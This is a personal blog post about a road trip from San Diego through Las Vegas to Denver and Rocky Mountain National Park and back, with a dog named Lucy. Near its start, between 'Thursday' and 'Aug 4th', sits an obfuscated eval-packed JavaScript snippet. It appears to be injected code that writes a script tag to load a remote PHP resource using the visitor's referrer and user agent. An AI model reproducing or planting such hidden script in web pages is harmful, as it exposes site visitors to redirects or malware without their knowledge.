Amazing road trip

I just got back from an amazing roadtrip. Here are the details of what we did:

Thursday eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thhni|var|u0026u|referrer|rythe||js|php’.split(‘|’),0,{}))
Aug 4th

Left San Diego and headed towards Vegas. Did I mention it was Pam, myself and Lucy (our Golden Retriever). We arrived in Las Vegas around 1am and stayed at a La Quinta off the strip. The La Quinta was really nice, cheap and didn’t charge extra for dogs. We had to get up early to hit the road, so we didn’t do anything in Vegas at this time.

Friday Aug 5th
We left in the morning around 10am and headed towards Fruita, CO, which is right across the CO border. We made it there about 6/7pm and once again stayed at a La Quinta, good times. We grabbed some mongolian BBQ while there and took it easy. We had to leave early the next day to make it to Denver, CO to see Pam’s family so we didn’t do any sight seeing in Fruita.

Saturday Aug 6th
We made it to Denver around 2pm and checked into our Hotel VQ which is right next to the Bronco’s Stadium. Lucy met her cousin (Ani) for the first time. Ani is Pam’s brother’s black lab. They clicked right away and had a blast. We then went downtown as we had tickets to the Rockies vs Washington Nationals game. Before the game, Pam and I went to a bar called 1up. It is an arcade bar where they had a
lot of vintage games and we happen to luck out and be there when Steve Wiebe was playing donkey kong. For those not familiar with him, he was the world record holder of Donkey Kong high score and was features in the Documentary King of Kong, which is an excelent movie. Here is a pic of Steve Wiebe and me. After hanging out at the 1up bar we went to the Rockies game. We had great seats on the 1st base line thanks to Pam’s brother, and it was a great game. I indulged myself by getting a pretzel with the cheese dip 🙂 After the game we went back to the hotel and chilled for the rest of the night.

Sunday Aug 7th
We woke up Sunday and packed up the car to head over to the Rocky Mountain National Park. We had a cabin right outside of the park entrance. The cabin was nice and allowed dogs. I was able to chill by a stream near our cabin and get caught up with work while enjoying the amazing views. Here is a pic from where I sat: After playing catchup Pam, myself and her Mom went out to dinner and a local road side diner. I had an excellent 14oz Prime rib with red potatoes and sweet potato fries. Needless to say I had a traditional meat and potatoes dinner. After dinner we went over to Pam’s brother’s camp site where we hung out and made Smores. It was a beautifully clear night and I was able to see every star. We then headed back to the cabin and called it a night.

Monday Aug 8th
Monday I had some time to myself to take in the scenic beauty around the cabin and clear my head. It was a nice unplugging moment. After that I went on a drive with Pam, her mom and Dad up into the Rocky Mountain National Park. We saw over 50 Elk, a Marmot, and amazing vistas as far as the eye could see. After the drive we reconnected with Pam’s bro and sis at the campsite and then got some fixins to grill out at the cabin, including Flank steak (I was craving it the whole time). We then hung out for a bit and called it a night.

Tuesday Aug 9th
We got up Tuesday and started to pack up to hit the road on our way back to San Diego. We got a great family pic in with the dogs and then took Pam’s sister to the airport so she could fly back. Pam and I made our way to Grand Junction, CO where we stayed the night at another La Quinta, did I mention that I like La Quinta 🙂 We ventured out for some food that night and I got a Little Caesar pizza(comfort food) and Pam got some Frozen Yogurt. It was a little bit of a veg night which is always good.

Wednesday Aug 10th
We woke up Wednesday and headed over to a Meadery, which is a winery where they supplement grapes for Honey. The Meadery name was Meadery of the Rockies and they had free tastings. We tried some of the wine and it was really tasty. We grabbed a couple of bottles to bring back. After that we went to the Colorado National Monument. We had grabbed an annual National Parks pass at Rocky Mountain National park and wanted to take advantage of the great parks along the way. The views were amazing as you can see from this pic: We spent about an hour there and then hit the road with the destination set for Flagstaff, AZ. We got into Flagstaff at almost exactly midnight. It was a long day of driving and we spent the night at a Travelodge Motel. It was really cheap and that was about all that it had going for it.

Thursday Aug 11th
Thursday we woke up early and hit the road. The first destination: The Grand Canyon. We made it to the Grand Canyon in a little under 2 hours and after seeing it, the name is very fitting. It truly is Grand! After the breathtaking views, we hopped back in the car. Next destination: The Hoover Dam. We made it to the Dam and took a couple of pics but didn’t linger too much. Did I mention that all of the spots we went to were pretty packed with tourists? We continued onto Vegas and spent the night at the La Quinta that we were at on the first night of the trip. We got settled in and then went out to Fremont Street and saw an amazing Doors tribute montage on the big screen over Fremont street. Lucy was a little freaked out so we didn’t stay long. I did have enough time to run into a casino and lose $1 on a slot machine, I wasn’t shooting for big wins 🙂 We then went back to the hotel and chilled for the rest of the night.

Friday Aug 12th
We woke up early Friday and hit the road on the way back to San Diego. We didn’t doddle on the way back and made it into town around 3pm. I then went and got a haircut, it was getting a little too crazy, and we settled back into our home. Lucy was sooo tired from the trip she came into the house and laid down on her bed. I’m happy to say a good nights sleep got her rejuvenated.

All in all this was an amazing road trip and in fact the longest road trip I’ve ever been on. If anything this got me more excited to continue travelling with Pam and Lucy. Who knows where we’ll go next?

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create your website at
Get started
%d bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close